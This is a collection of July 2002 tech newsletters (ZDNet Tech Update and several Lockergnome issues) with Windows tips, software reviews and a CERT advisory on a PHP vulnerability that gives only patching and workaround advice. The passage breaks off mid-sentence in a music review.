  <si>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Tech Update TodayVITAL SIGNS FOR JULY 22, 2002
David BerlindWhy HP could be king of servers Not only does HP have the inside track on Intel's IA-64, but the company also has a companion chipset called ZX1. HP is well-armed to battle IBM and Dell for server dominance.
Here's the source of HP's EPIC powerLatest from ZDNet News
Federal bill targets e- waste
Wi-Fi group clears up naming confusion
Movement grows to boost Wi-Fi hot spots
Network defenders crack challenge
Could WorldCom woes spark a price war?
Web services breeds teamwork
Gateway fights back with PC rebatesMore Enterprise NewsFarber's PicksDanFarberBracing for an Internet meltdownCompanies around the world are developing co-location facilities, interviewing backup vendors and bolstering wireless capabilities in anticipation of potential communication service problems. The disgracing of vaunted names in the telecom-munications sector -- Worldcom, KPNQwest, Global Crossing -- and talk of a broader meltdown is prompting a sense of imminent disaster at companies that rely on Internet, phone or wireless connections for revenue and employee productivity. How worried are you?Read the full storyKPNQwest employees walk outWhat's your biggest tech nightmare?It's a question that CNet News.com posed to the top IT officers at some of America's largest Fortune 100 companies. Many of the technology leaders--from IBM, Citigroup, General Motors and Ford Motor--cited security as the mother of all IT nightmares. Among the other complaints: cost overuns, unreliable technology, unstable vendors and disaster recovery . In contrast, Fannie Mae CTO Julie St. John said nothing keeps her up at night "because I plan so far ahead on the infrastructure and the things that can bite us." What about you?
Take our QuickPoll
Conditions for Itanium 2 adoption
Gartner thinks enterprises should evaluate their Itanium 2 strategy based on three key elements: Hardware, OS and applications. Wait until all three elements align before considering production deployment of Itanium 2 solutions.
Read the full story
Senate stops P2P, so should youThe U.S. Senate sets a good, albeit belated, example by shutting off peer-to-peer networking. Tech Update's Wayne Rash says you'd be foolish not to follow suit. Removing P2P networking from your company's computers is a quick way to lower the risk of damage from worms and viruses--and to limit the damage a hacker can do.
Read the full story
Bill Gates, e-mail newsletter editorIn the future, everyone will have their own e-mail newsletter. If Berlind and Farber have one, why not Gates and Ballmer? According to Microsoft, the two execs will issue newsletters on the company's views about the role of technology and public policy. The first volume, about Microsoft's Trustworthy Computing initiative, went out Wednesday and was reputedly penned by Gates.
See what Bill has to say
Back to topAlso on Tech Update Today
FEATUREÂ Microsoft enhances directory technology
Update: Microsoft is expanding the capability of its directory technology to allow customers to more easily add new applications to their network.REVIEWÂ Outlook alternatives
Need a sturdy organizer/scheduler that won't beggar you? An alternative PIM might do the trick.COMMENTARYÂ NT4 users: Act now or...
Whether or not you like Microsoft's new licensing plan, if you're still running NT4, Larry Seltzer says you've got decisions to make, and soon.PREVIOUSLY ON TECH UPDATE TODAYÂ Hey, thief! This laptop is locked
Try stealing my notebook and Caveo Anti-Theft will yell at you louder and louder -- before resorting to an unstoppable, ear-piercing screech.Crucial Clicks--products worth looking at
MONITORSA Porsche you can afford
Samsung paired up with F.A. Porsche designers to deliver the SyncMaster 171P, a sleek, 17-inch LCD.Read reviewMost Popular ProductsMonitors
1. Samsung SyncMaster 151S
2. NEC MultiSync 1550V
3. Envision EN-5100e
4. Samsung SyncMaster 570 V
5. Samsung SyncMaster 955 DF
More popular monitors
Elsewhere on ZDNetAcer brings P4 power to the people - read the review at ZDNet. Download Builder.com's 'Remedial XML' series.Need a memory upgrade? Find out with CNET"s Memory Configurator.Tech Update: Put a lid on CRM costs with self-service.  Check out thousands of IT job listings in ZDNet"s Career Center.Â 
Â 
Sign up for more free newsletters from ZDNetThe e-mail address for your subscription isÂ qqqqqqqqqq-zdnet@spamassassin.taint.orgUnsubscribeÂ |
        Â Manage
        My SubscriptionsÂ |Â FAQÂ |
        Â Advertise
Home |eBusiness | Security | Networking | Applications | Platforms | Hardware | Contact us
        Copyright 2002 CNET Networks, Inc. All rights reserved. ZDNet is a registered service mark of CNET Networks, Inc.          </t>
  </si>
  <si>
    <t>&lt;!--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20020722 Lockergnome Windows Daily
Â  07.22.2002 GnomeREPORT Hackers and crackers respect only one thing: strong security.  Keep the bad guys out of your PC or network with the advanced technology that's trusted by millions:  ZoneAlarm Pro 3.0. This best-in-class personal firewall stops hackers cold, defends your online privacy,and sets up in minutes. Click here to download now!   Listen to Lockergnomie Dale Lowery and you'll save time
immediately. It's an old tip, but it bears repeating: "I'll often
find Web snippets I'd like to keep - but I don't want to save the
entire page. So, I've HOT-KEYED Notepad. Easy! Get to the most
common Notepad shortcut icon: Start | Programs | Accessories |
Notepad. Then right-click on the menu item and select Properties.
You'll see that this is (indeed) a shortcut; in the lower part of
the dialog is a field to add a hotkey. I entered 'N' for Notepad,
Windows offered CTRL and ALT as a prefix, and now I can launch
Notepad in an instant. I highlight the text I want to keep, copy
it, tap my shortcut, paste it, and then save the new text file
wherever I want. Most often, I use this trick to copy paragraphs
that describe downloads (and save them as text files in the same
folder as the download)." Just make sure you don't pick a keyboard
shortcut that's already in use. Otherwise, one of them is gonna
get cranky.And while we're taking a trip down memory lane, Lockergnomie Ian
Rich reminds us of Jouni Vuorio's utility: The site is
jv16.org. The program is called
jv16 Power Tools, and this freeware is truly worthy of praise. It
combines a full-on registry management tool with several file
manager tools: one to hunt down temporary files in any format and
the other to help perform advanced file searches and comparisons.
Mainly, I wanted the program to be brought to the attention of the
consumer public, as it moves further and further along in
development it just keeps getting better. I've used it on windows
Me, and now XP - without crashes or hair-raising Registry
corruption. It backs up everything it changes and is very easy to
use. If you're interested in something of shareware-quality with
forum support (for absolutely nothing), get this program. Anyway,
I love the newsletter and the work you guys and gals do at
Lockergnome. I hope that this author gets his recognition."
Consider this a huge nod!I love a good resource, and Lockergnomie Elton Jonsson from the
United Kingdom has one for us, too: "As a dedicated subscriber, I
just had to tell about this one. Have you ever been driven mad
trying to find out the name of the piece of music on a television
advert? Well, at last, here in the UK, we have an answer to that
problem and, given that many multinationals use the same
advertising in the USA as they do here, it may help out you guys
as well. Check out Commercial
Breaks and Beats. I have no connection with it; I'm just
grateful that someone has had the brilliant idea of creating it.
If you check the message board on the site, you'll see that I'm
not alone." This Google
Directory can help fill in the blanks, I'm sure. I
almost fell out of my chair the other day when I heard "Yeh Yeh"
(by TMBG) being played on a Chrysler advertisement. Way to go:
John, John, Dan, Dan, and Dan! You're the dogs kids love to bite.And what's say we round out the report with another tip?
Lockergnomie David Brown can oblige: "The e-mail forwarding
service is a good idea, but you can do it yourself with Outlook
Express. Set up two accounts (one for your old account and one for
your new one). Craft your reply in a new message and save it.
Then, select Tools | Message Rules | Mail | New rule. Check 'Where
the message is from specified account' in the first section.
'Reply with message" in section two. Select the appropriate
account and message in the final section. Name it. You can also
have the messages flagged or moved to another folder if you want
to know which messages came from the old account. Once the rule
has been created, any mail from the old account will have a reply
sent. People should learn about mail rules, anyway." True! So,
what rule simplifies your day?See You in August,Â Â Â Â Â Â Â Â Â Â Â Â Â Â Chris PirilloÂ Â Â Â Â Â Â 
Â GnomeDOWNLOADSLatest Downloads
Search Engine Buil 1.45
System Cleaner 4.80
Smasher 2.9.16
PixPrint 3.69
BatchIt! Pro 3.10
HyperMaker HTML 2002.11
Crystal Button 1.41
Spytech SpamAgent 1.0
BadCopy Pro 3.20
STOPzilla! 1.0.8
WAPDraw 1.31
Network File Monit 2.04QuicKalendar v1.0.2 [430k] W9x/2k/XP FREEhttp://www.trinfinitysoftware.com/quickalendar.shtml{Calendar utility} You say you want to get together on the 25th, but what DAY is that? I'm not good with calendar dates; truth be told, I don't even know what day of the week it is most the time. If I didn't have my PDA armed with a Calendar with me, then I wouldn't show up to anything on time, let alone on the right day. Well, that is great for when I am mobile, but what about when I am in front of my PC? The PDA is docked, but that doesn't mean I have to be without a calendar... enter QuicKalendar! "QuicKalendar gives you quick and easy access to a calendar whenever you need it. You can view the calendar on screen, or print it out to jot down notes and appointments." You need to keep in mind that the print feature is relative to how you have QuicKalendar displayed on your machine. If you are in full screen mode, then the printout will be bigger than a standard sheet of letter paper. If you try printing in normal view, then the printout will be too small to write on. My suggestion is to play with the size of QuicKalendar's screen until you get a printout that you can be proud of. Now, you'll have no reason to be late for Gnomedex!
Diatris v1.0 [407k] W9x/2k/XP FREEhttp://www.webruler.com/mtreciokas/{Tetris-like game} I've always been fascinated with geometric shapes. To me everything has to be somewhat symmetrical... even my hair! So it was no wonder why I was addicted to playing the game Tetris for so many years. The only problem with Tetris is that, after awhile, it starts to get a little too easy. Diatris is a bundle of three different - and much more challenging - Tetris-like games. "For the first game, Y-Diatris, the objects can move vertically and diagonally. The second game, X-Diatris, the objects can move only in two diagonal directions; the vertical drop is taken out. For the last game H-Diatris the objects can only move vertically and horizontally like most block drop games." I won't kid you, these games can be pretty hard, but if you are a Tetris fan, then these set of games are for you. If you're not a Tetris fan, don't worry, there are a few other games you might like on this site, so check it out!
Recommend It!
Â GnomeCLICKSÂ GnomeSYSTEM
How to Troubleshoot Issues with Reading CDshttp://support.microsoft.com/default.aspx?scid=kb;EN-US;Q321641{Disc device troubleshooting} "This article describes how you can troubleshoot issues reading CD-ROM or DVD-ROM optical discs. This article also discusses how to troubleshoot common issues with CD-R and CD-RW devices. The steps in this article apply to compact disc (CD-ROM) drives, compact disc recordable (CD-R) drives, compact disc re-writable (CD-RW) drives, and digital video disc (DVD) drives." To summarize, you should try the steps on this site before calling your technical support. Some of the steps include closing unnecessary software, testing the disc in a different computer, and cleaning the disc. Make sure to clean a disc by wiping from the center of the disc outward... if you wipe the disc in a circular fashion, then you risk scratching it. The steps in this article will only serve to save you time, as you will probably be able to fix most disc problems by following the steps. If this article doesn't help you resolve your disc problem, look on the bright side... you won't have to spend so much time on the phone with technical support, because you'll already know what the problem ISN'T! 
Recommend It!
Â GnomeWILDCARD
Modem Spy v3.1.3b [230k] W9x/2k/XP $25
    Unearthed by Sergei Polishchukhttp://www.modemspy.com/{Answering machine} "Modem spy is a handy utility for phone calls recording. Features: 1) Records phone conversations. 2) Records from microphone. 3) Plays back recorded messages via phone line. 4) Plays back recorded messages via sound card. 5) Can record ALL incoming phone calls. 6) Has built-in software automatic gain control. 7) Detects and logs Caller ID." Gnomie Brian Stevens tried this one out for us, but had a small problem testing this on any of his machines... he doesn't have any modems! Brian says, "I was able to load the program, though, and try a few of the features out. You can record an audio memo to your machine, much like an answering machine. You can also e-mail this audio memo, although I don't recommend you do that as the WAV file didn't seem to play well when I tried e-mailing it to myself (which may have been due to the microphone it was recorded with). Other than that, Modem Spy is a solid program and is a great alternative to buying a traditional answering machine... plus in most cases it is cheaper!" Keep in mind that, for Caller ID to work, you need the Caller ID service turned on by your phone service provider.
Submit Your Thoughts | Recommend It!
Â GnomeFAVORITE GET HIGH-SPEED ACCESS: Verizon Online DSL is an affordable,  high-speed Internet connection.   Click here  to see if Verizon Online DSL is available in your area. The Avocado Papers
   Unearthed by Meryl Evanshttp://www.theavocadopapers.com/After surfing serious Web site upon serious Web site, you just need to find a site where you can relax and have a good time. TheAvocadoPapers.com is one of those sites that is a little bit goofy but extremely creative. It isn't that the Web site is really about anything; there is some creative writing (usually rather funny) and the occasional interview (this week "Steve Schneider Interviews Himself"). If you are a little bit nosy, and want to peek into the lives of others, you can read Ron Bork's diary or enter the Avocado Chat. Although the makers of the Web site don't even know what it is about, I think it is quite apparent... fun! Go check out the Web site for yourself and see if you can pin down its rhyme or reason. Worst-case scenario, you can always sign up for their current promotion... free linguine!
Recommend It!
Â GnomeTIPThis tip is for the Windows XP users out there. "The Windows XP operating system achieves excellent performance in part by dynamic adjustments that it makes in response to how a system is utilized. In particular, many adjustments are made when the system first runs following setup and when newly installed applications are used for the first time. These adjustments greatly influence the performance of the system. Unfortunately, the dynamic nature of Windows XP can make benchmarking more of a challenge than with previous Windows versions." To properly benchmark your Windows XP system, there are a few steps you should follow. The step with which we are concerned in this particular tip is letting your PC process any "idle tasks." Idle tasks are tasks that your PC executes when it deems the system to be unused or idle. Some of these include file placement optimization, system restore, and done-once-after-setup work items. "All of these 'idle tasks' are controllable by a system API in advapi32.dll, ProcessIdleTasks. The API's sole purpose is to allow benchmarks a simple way to force any pending idle tasks to be executed immediately, without having to wait a lengthy period of time. To call ProcessIdleTasks from the command line, use this syntax: Rundll32.exe advapi32.dll,ProcessIdleTasks." Once running, it may take up to around 15 minutes to process all of the idle tasks, and your hard drive will be active through most of it. For more steps on preparing your Windows XP machine for benchmarking, head over to the Windows Platform Development page on Benchmarking for Windows XP on Microsoft's site.
Recommend It!http://www.lockergnome.com/issues/daily/20020722.html
Your subscribed e-mail address is: [qqqqqqqqqq-lg@spamassassin.taint.org] - To unsubscribe or change your delivery address, please visit the subscription management page. For further information, please refer to the GnomeCREDITS in the sidebar.LOOK OVER HEREÂ Download Our Tip FilesÂ Latest Windows Daily
Â Latest Digital Media
Â Latest Tech Specialist
Â Latest Penguin Shell
Â Latest Apple Core
Â Latest Web Weekly
Â Latest Bits &amp; BytesÂ Find the Lowest PriceÂ Suggest a Feature
Â Advertise With Us
Â The GnomeSTORE
Â High-Tech Job Search
Â Chat With Gnomies
Â Watch The Webcams
Â Computer Power UserÂ Read Past Issues
Â Download X-Setup
Â About Lockergnome
Â Our Privacy Policy
Â View More Options
Â Our XML / RSS Feed
Â Syndicate Our Tips
Â Link To Lockergnome
Â Get Chris's BookÂ Tell a Friend About Us!Â General Feedback
Â E-mail the Editor
Â The Editor's Blog
Â 
SEARCH
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HAPPY FUN STUFF
And now, I finally have proof that the vacuum attachment wants to eat Sprocket. He's been eyeing it for weeks.Sprocket's Pipe Dream
Â 
CLICK HERE TO ZOOMÂ Â 
BYTE ME NOWÂ©2002, Lockergnome LLC. ISSN: 1095-3965. All Rights Reserved. Please read our Terms of Service. Our Web site is hosted by DigitalDaze. Domain registered at DNS Central.We interrupt this quote for an important bulletin...</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</si>
  <si>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20020722 Lockergnome Tech Specialist
Â  07.22.2002 GnomeREPORT 
50 TIPS TO MAKE WINDOWS MORE USEFUL 
Do you have to deal with Windows on a daily basis? Might as well 
maximize your time with it. You'll find that some of these tips 
will apply to other operating systems, too. The world of computing 
isn't so mysterious once you understand how it works. With this 
GnomeTome, you'll begin to work faster - and smarter. 
Download Windows Productivity Tips now!  I did a lot this weekend, but I didn't really get much done, 
ya know? My knees are killing me from hauling stuff out of 
the basement for storage up in the attic, but the pile only 
made it as far as the kitchen. Then I stripped and painted 
the floor where that collection of stuff was previously 
stored, and erected some shelving so I'd have room for more 
stuff. I woke up the next morning discover a very sick 
ferret, likely from the fumes that leeched into the next 
room over despite the ventilation I had setup to prevent the 
migration of bad air. So, I ended up dismantling the ferret 
cage to move it upstairs for a week or so until I'm sure 
it's safe. Thankfully, all critters are doing well now.I also started in on replacing the cheapo rusted screws 
with stainless steel deck screws out back, but found that 
the ones I picked up are too weak, leaving me with stripped 
out heads and bent shafts. That project stopped after barely 
getting started. The front steps are also in need of rust-
proof screws, but they are made from much softer wood, so I 
moved the tools to the other side of the house. Two-thirds 
of the way through the first row, I found that the extra 
1/2" on the screws I purchased was too much and I began 
running into the top of the old concrete steps underneath. 
Figures. Live and learn. Oh well, it was entirely too hot to work outside anyway. 
Back down to the basement I went to geek out instead. 
Roughly an hour into geekitude, I glanced over and realized 
it was 78.7 degrees in the basement and I was virtually 
stuck to my chair from the sweat. I shut off as much as I 
really could and still work on a couple of projects, but it 
didn't help the heat situation much. It was just too hot 
outside for the air conditioner to keep up with the added 
heat from the computers. That left me in need of a shower 
and with only the notebook in the living room for the 
balance of the weekend. I cleaned out a lot of ancient 
email, which was nice, but nothing really got accomplished 
otherwise. Boy, am I tired. And the weekend is so far away.Hey, the second season of M*A*S*H comes out on DVD 
tomorrow! That should put me in better spirits. I could 
watch M*A*S*H for hours on end. In fact, I often do just 
that. The only kink is that the episodes don't play back-to-back 
from DVD. I'm going to play with AppleScript on the Mac 
to see if I can customize how the individual discs play. In 
theory, I should be able to make a disc play all the way 
through. If I succeed, I'll be sure to share the script 
technique in the AppleCore newsletter. Too bad I can't do that with a stand-alone DVD player.See You in August,Â Â Â Â Â Â Â Â Â Â Â Â Â Â Randy NielandÂ Â Â Â Â Â Â Â GnomeNETWORK
Slow File Save Dialog Boxes
Pointed out by Ian Hargreaveshttp://support.microsoft.com/default.aspx?scid=kb;en-us;q321126
I've hated this one for a long time, and now we have a 
hotfix and a workaround, so take your pick as to which will 
work best. I often map drive letters to specific network 
shares, and if I happen to have a system turned off, I'll 
notice a significant delay when clicking the drop-down boxes 
in Open, Look In or Save In/As dialog boxes. Windows 2000 
attempts to reconnect to mapped resources before showing you 
the list, and depending on how many drives you have mapped 
and how many of those resources are unavailable, it can take 
eons just to save a file. A workaround is to use the My 
Network Places functionality instead of mapping drive 
letters. Fine for some, but I prefer having drive letters 
mapped for many things, being that I work at a command 
prompt quite a bit, and it's easier to navigate that way. 
Alternatively, a hotfix is now available, but you'll have to 
contact Microsoft to obtain the fix if that's the route you 
choose.
Â GnomeSYSTEM
Customized 9x/ME Blue Screen Errors
http://www.vsres.com/blscrn/
We've all seen 'em. Those annoyingly incoherent blue 
screens indicating a system error of some sort, but provide 
no real help in solving the problem. If you're a programmer 
that has had to deal with error conditions produced by 
Windows 95/98/ME, then this might be a better way to handle 
them within your applications. Blue Screen v1.21 is an 
ActiveX control that uses the standard Windows system error 
functions, but provides a way to pass along text and 
response options you designate. Note that this is not 
functional on Windows NT/2000/XP, which handle system errors 
in an entirely different manner.Gamers Beware of Intel 845G Chipset
http://www.theinquirer.net/?article=4532
http://www.theinquirer.net/?article=4513
Discount the AMD hype and returned volley from Intel when 
reading up on all of this, but one thing is painfully clear. 
The Intel 845G chipset and P4 Celeron processors really 
don't provide an acceptable gaming experience. Not only is 
performance subject to ridicule, but compatibility is also 
looking to be a serious matter. Intel has never claimed that 
Celerons were high-end desktop processors, but they have 
typically provided a decent enough experience that they can 
make for acceptable machines for the more budget-minded 
consumer. The compatibility issues with this particular 
version of Celeron and the 845G chipset are something to 
watch out for. Once the Celeron is moved to the .13 micron 
core, I suspect the performance concern won't remain, but 
the 845G alone seems to have it's own problems without 
adding the Celeron misery. The lesson in knowing what 
hardware you're buying is what's important here.Â GnomeALERTZ
Today's Top 5 kbAlertzQ296133 - WD2002: Recorded Macro to Create Right-to-Left Style Records Paragraph Alignment Incorrectly (Q296133)
Q292152 - WD2002: Macro to Modify Currently Selected Text Does Not Work Correctly (Q292152)
Q292150 - WD2002: Undo Command Does Not Remove List Style Link to Paragraph Style (Q292150)
Q292094 - WD2002: Error Message: Microsoft Mail Local Fax Is Not Installed on Your System (Q292094)
Q292078 - WD2002: New Document Created by Macro While Word Is Minimized Opens in Restored State (Q292078)CLEAN YOUR SYSTEM Add/Remove Plus! 2002 offers a new and better way 
to uninstall programs you no longer want on your computer. All you have to do 
is double-click on a Desktop icon called "Uninstall Programs", quickly find 
the program you want to uninstall and click a button. Add/Remove Plus! 2002, 
unlike the standard Windows uninstall feature (the Control Panel Add/Remove 
Programs applet), will uninstall the program and remove it from the list. 
Get Your Copy of Add/Remove Plus Now!
Recommend It!
Â GnomeASSISTANT
Test Drive Compaq Servers
http://www.testdrive.compaq.com/
Compaq (Ok, HP) offers a set of servers running various 
*nix operating systems, as well as Oracle 9i, for test 
drive. Just register for an account and you can tinker 
around with Linux, FreeBSD or even Tru64 Unix running on an 
Alpha server, but without the hassle and expense of 
obtaining your own toys. I love the idea of having a pre-
configured environment that lets you kick the tires without 
causing any permanent damage. 
Â GnomeSTUFF
Too Cool
http://www.pcworld.com/news/article/0,aid,102779,00.asp
This was just too interesting not to mention. Water-cooled 
systems are all-the-rage among overclockers and those 
that seem to need bragging rights over their friends' computer 
systems. Hitachi is taking a chapter from that tome and 
applying the concept where it's truly needed - notebook 
computers. Believe me when I say that these suckers get very 
hot. I spend half my life with notebook planted on lap, and 
I have to put something between the two surfaces to avoid my 
own little heat stroke. Fans and the mini water cooling 
system Hitachi is implementing provide roughly the same heat 
mitigation efficiency, but without the noise. The concept of 
a water-cooled notebook sounds a little odd, but I would 
welcome the elimination of the turbine droning with open 
arms.
Recommend It!http://www.lockergnome.com/issues/techspecialist/20020722.html
Your subscribed e-mail address is: [qqqqqqqqqq-lg@spamassassin.taint.org]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ZOOMÂ 
LOOK IT UPÂ 
BYTE ME NOWÂ©2002, Lockergnome LLC. ISSN: 1095-3965. All Rights Reserved. Please read our Terms of Service. Our Web site is hosted by DigitalDaze. Domain registered at DNS Central.</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----CERT Advisory CA-2002-21 Vulnerability in PHP   Original release date: July 22, 2002
   Last revised: --
   Source: CERT/CC   A complete revision history can be found at the end of this file.Systems Affected     * Systems running PHP versions 4.2.0 or 4.2.1Overview   A  vulnerability  has been discovered in PHP. This vulnerability could
   be  used  by  a remote attacker to execute arbitrary code or crash PHP
   and/or the web server.I.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architecture.III. SolutionApply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directly.Upgrade to the latest version of PHP   If  a  patch  is  not  available  from your vendor, upgrade to version
   4.2.2.Deny POST requests   Until  patches  or an update can be applied, you may wish to deny POST
   requests.  The  following  workaround  is  taken from the PHP Security
   Advisory:     If  the  PHP  applications on an affected web server do not rely on
     HTTP POST input from user agents, it is often possible to deny POST
     requests on the web server.     In  the  Apache  web server, for example, this is possible with the
     following  code  included  in  the  main  configuration  file  or a
     top-level .htaccess file:     
        Order deny,allow
        Deny from all
          Note  that an existing configuration and/or .htaccess file may have
     parameters contradicting the example given above.Disable vulnerable service   Until  you  can upgrade or apply patches, you may wish to disable PHP.
   As a best practice, the CERT/CC recommends disabling all services that
   are not explicitly required. Before deciding to disable PHP, carefully
   consider your service requirements.Appendix A. - Vendor Information   This  appendix  contains  information  provided  by  vendors  for this
   advisory.  As  vendors  report new information to the CERT/CC, we will
   update this section and note the changes in our revision history. If a
   particular  vendor  is  not  listed  below, we have not received their
   comments.Apple Computer Inc.          Mac  OS  X  and  Mac  OS X Server are shipping with PHP version
          4.1.2  which  does  not  contain the vulnerability described in
          this alert.Caldera          Caldera  OpenLinux  does  not provide either vulnerable version
          (4.2.0,  4.2.1)  of  PHP  in their products. Therefore, Caldera
          products are not vulnerable to this issue.Compaq Computer Corporation          SOURCE:  Compaq Computer Corporation, a wholly-owned subsidiary
          of  Hewlett-Packard  Company  and  Hewlett-Packard  Company  HP
          Services Software Security Response Team
          x-ref: SSRT2300 php post requests
          At  the  time  of  writing  this  document, Compaq is currently
          investigating   the   potential  impact  to  Compaq's  released
          Operating System software products.
          As  further  information  becomes available Compaq will provide
          notice  of  the  availability  of any necessary patches through
          standard  security bulletin announcements and be available from
          your normal HP Services supportchannel.Cray Inc.          Cray, Inc. does not supply PHP on any of its systems.Debian          Debian GNU/Linux stable aka 3.0 is not vulnerable.
          Debian GNU/Linux testing is not vulnerable.
          Debian GNU/Linux unstable is vulnerable.
          The  problem  effects PHP versions 4.2.0 and 4.2.1. Woody ships
          an  older  version  of  PHP  (4.1.2),  that doesn't contain the
          vulnerable function.FreeBSD          FreeBSD  does not include any version of PHP by default, and so
          is  not  vulnerable; however, the FreeBSD Ports Collection does
          contain  the  PHP4  package. Updates to the PHP4 package are in
          progress  and a corrected package will be available in the near
          future.Guardian Digital          Guardian  Digital  has not shipped PHP 4.2.x in any versions of
          EnGarde, therefore we are not believed to be vulnerable at this
          time.Hewlett-Packard Company          SOURCE:  Hewlett-Packard Company Security Response Team
          At  the  time  of  writing  this  document,  Hewlett Packard is
          currently  investigating  the potential impact to HP's released
          Operating System software products.
          As further information becomes available HP will provide notice
          of  the  availability of any necessary patches through standard
          security  bulletin  announcements  and  be  available from your
          normal HP Services support channel.IBM          IBM  is  not vulnerable to the above vulnerabilities in PHP. We
          do  supply the PHP packages for AIX through the AIX Toolbox for
          Linux  Applications.  However,  these packages are at 4.0.6 and
          also incorporate the security patch from 2/27/2002.Mandrakesoft          Mandrake Linux does not ship with PHP version 4.2.x and as such
          is  not  vulnerable.  The  Mandrake Linux cooker does currently
          contain  PHP  4.2.1  and  will  be  updated shortly, but cooker
          should  not be used in a production environment and no advisory
          will be issued.Microsoft Corporation          Microsoft  products  are not affected by the issues detailed in
          this advisory.Network Appliance          No Netapp products are vulnerable to this.Red Hat Inc.          None  of  our commercial releases ship with vulnerable versions
          of PHP (4.2.0, 4.2.1).SuSE Inc.          SuSE Linux is not vulnerable to this problem, as we do not ship
          PHP 4.2.x.
     _________________________________________________________________   The  CERT/CC acknowledges e-matters GmbH for discovering and reporting
   this vulnerability.
     _________________________________________________________________   Author: Ian A. Finlay.
   ______________________________________________________________________   This document is available from:
   http://www.cert.org/advisories/CA-2002-21.html
   ______________________________________________________________________CERT/CC Contact Information   Email: cert@cert.org
          Phone: +1 412-268-7090 (24-hour hotline)
          Fax: +1 412-268-6989
          Postal address:
          CERT Coordination Center
          Software Engineering Institute
          Carnegie Mellon University
          Pittsburgh PA 15213-3890
          U.S.A.   CERT/CC   personnel   answer  the  hotline  08:00-17:00  EST(GMT-5)  /
   EDT(GMT-4)  Monday  through  Friday;  they are on call for emergencies
   during other hours, on U.S. holidays, and on weekends.Using encryption   We  strongly  urge you to encrypt sensitive information sent by email.
   Our public PGP key is available from
   http://www.cert.org/CERT_PGP.key   If  you  prefer  to  use  DES,  please  call the CERT hotline for more
   information.Getting security information   CERT  publications  and  other security information are available from
   our web site
   http://www.cert.org/   To  subscribe  to  the CERT mailing list for advisories and bulletins,
   send  email  to majordomo@cert.org. Please include in the body of your
   message   subscribe cert-advisory   *  "CERT"  and  "CERT  Coordination Center" are registered in the U.S.
   Patent and Trademark Office.
   ______________________________________________________________________   NO WARRANTY
   Any  material furnished by Carnegie Mellon University and the Software
   Engineering  Institute  is  furnished  on  an  "as is" basis. Carnegie
   Mellon University makes no warranties of any kind, either expressed or
   implied  as  to  any matter including, but not limited to, warranty of
   fitness  for  a  particular purpose or merchantability, exclusivity or
   results  obtained from use of the material. Carnegie Mellon University
   does  not  make  any warranty of any kind with respect to freedom from
   patent, trademark, or copyright infringement.
     _________________________________________________________________   Conditions for use, disclaimers, and sponsorship information   Copyright 2002 Carnegie Mellon University.   Revision History
July 22, 2002:  Initial release
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8iQCVAwUBPTyOVqCVPMXQI2HJAQGK6QQAp1rR7K18PNxpQZvqKPYWxyrtpiT8mmKN
UuyERmOoX+5MAwH0hbAWCvVcyLH0gKGbTpBkRgToT8IEHZojwHCzqOaMM9kni/FG
QEVeznLfBX4GIgZGPu0XWlph3ZqaayWln57eGueYZ26zBuriIUu2cUCmyYGQkqlI
tuZdnDqUmR0=
=+829
-----END PGP SIGNATURE-----
</t>
  </si>
  <si>
    <t>&lt;!--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20020722 Lockergnome Digital Media
Â 07.22.2002 MediaREPORT
TextAloud MP3 converts text to speech and to MP3 
Listen to email, Web pages, e-books, and more on your PC or 
portable MP3 player.  As featured in PC Magazine, The New 
York Times, and on CNN.  Now available with optional
AT&amp;T Natural Voices, the most advanced computer speech for your PC. 
Listen to a demo, then 
download your trial copy.
Lockergnome's Guide to Converting Vinyl LPs to CD is no longer free. 
Over the last 10 days, almost 4,000 people downloaded the free tome. 
Of that 4,000, close to half put in a fake e-mail address, resulting 
in a ridiculous number of bounce messages in my inbox. Add to that 
the fact that several of the clever individuals used other people's 
real addresses, which then amounted to complaints of spam from the 
address owners. It's not worth providing a free service if it causes 
Lockergnome to be labeled a spammer as a result. The crowning gem was 
the in-duh-vidual who used the name A** Hole and Chris's personal 
address to download the PDF. On a more positive note, the guide is 
now available in all six formats,  
for the minimal price of $5, complete with some additional content 
based on a couple reader suggestions.Chris may have an obsession with Peets coffee, but I'll bet he's never 
been the daily special. On my visit to St. Louis, for the 
SIC, I 
started every morning with a walk to the West Port Starbucks. 
Apparently my morning ritual was a source of entertainment for the 
employees, which evolved into discussions of a reality based TV show 
based on the concept of stalking me. I've even got the 
incriminating evidence 
to prove it.The SIC provided me the opportunity to see some cool updates to a couple 
titles, in addition to being introduced to some useful audio oriented 
titles I'd never seen before. Expect a number of reviews over the next 
several weeks, as well as extensive coverage of last week's events in 
St. Louis in the annual SIC special issue. Lori managed to score a few 
more Gnomedex giveaways while we were in attendance, so those of you who 
sign up will be coming home with even more goodies, which, by the way, 
aren't of the stressball and pen variety -- we're talking software 
titles with reg codes.
Jake LudingtonÂ Â Â Â Â Â Â Â Â GnomePRODUCER
NVIDIA CONTEST - SIGGRAPH 2002
http://www.siggraph.org/s2002/flashhome.html
http://www.nvidia.com/If you're in San Antonio July 23-25, for this year's Siggraph conference, 
you'll want to stop by the nVidia booth (#19102). Every 30 minutes 10 
people will be competing for a NVIDIA Quadro4 750 XGL professional 
graphics solution, using NVIDIA-provided traditional art materials such 
as charcoal, pastels, crayons and paper to create something artistic. 
All artwork must be original, unpublished work. Artwork must also
incorporate the NVIDIA logo and be created on-site at SIGGRAPH during the
10-minute contest round. Judging will be based on artistry; creativity and
originality; technical merit; and theme incorporation. Artwork will not be
returned to contestants and will become the property of NVIDIA as outlined
in the contest registration form. Even if you don't win, you'll still get a free t-shirt.Â GnomeFEATURE
DreamQuest Championship Card Games
For Pocket PC, Palm, Symbian OS
http://www.dq.com/palm.htmlPlaying games on a PDA has killed plenty of my time spent waiting in 
airports around the US. With the recent porting of these three classic 
PC card games from DreamQuest, I've added some of the best in PC 
entertainment to my arsenal of PDA diversions. Hearts, Spades and Euchre 
all play in a similar manner to their PC versions, only on a smaller 
screen. Available for Pocket PC, Palm, and even the Symbian OS, you can 
play cards against computer opponents or connect to the online game room 
and challenge other players using any of the games multiple platforms. 
This is a unique experience currently unavailable for any other pocket games. Â GnomeSKIN
Yadnus for Winamp 2.x by mcPosted on  7/22/02 2:02PM  -- Â Â  
[Download]Â --Â [Zoom]
Â --Â [Visit DeskMod]
Get your copy of SkinStudio XPÂ GnomeAUDIO
Rexway
http://artists.mp3s.com/artists/56/rexway.html
Blending punk rock attitude with country twang makes for a fairly 
unique musical experience. I saw these guys play a show in Omaha, 
back in January of this year and was blown away by their stage 
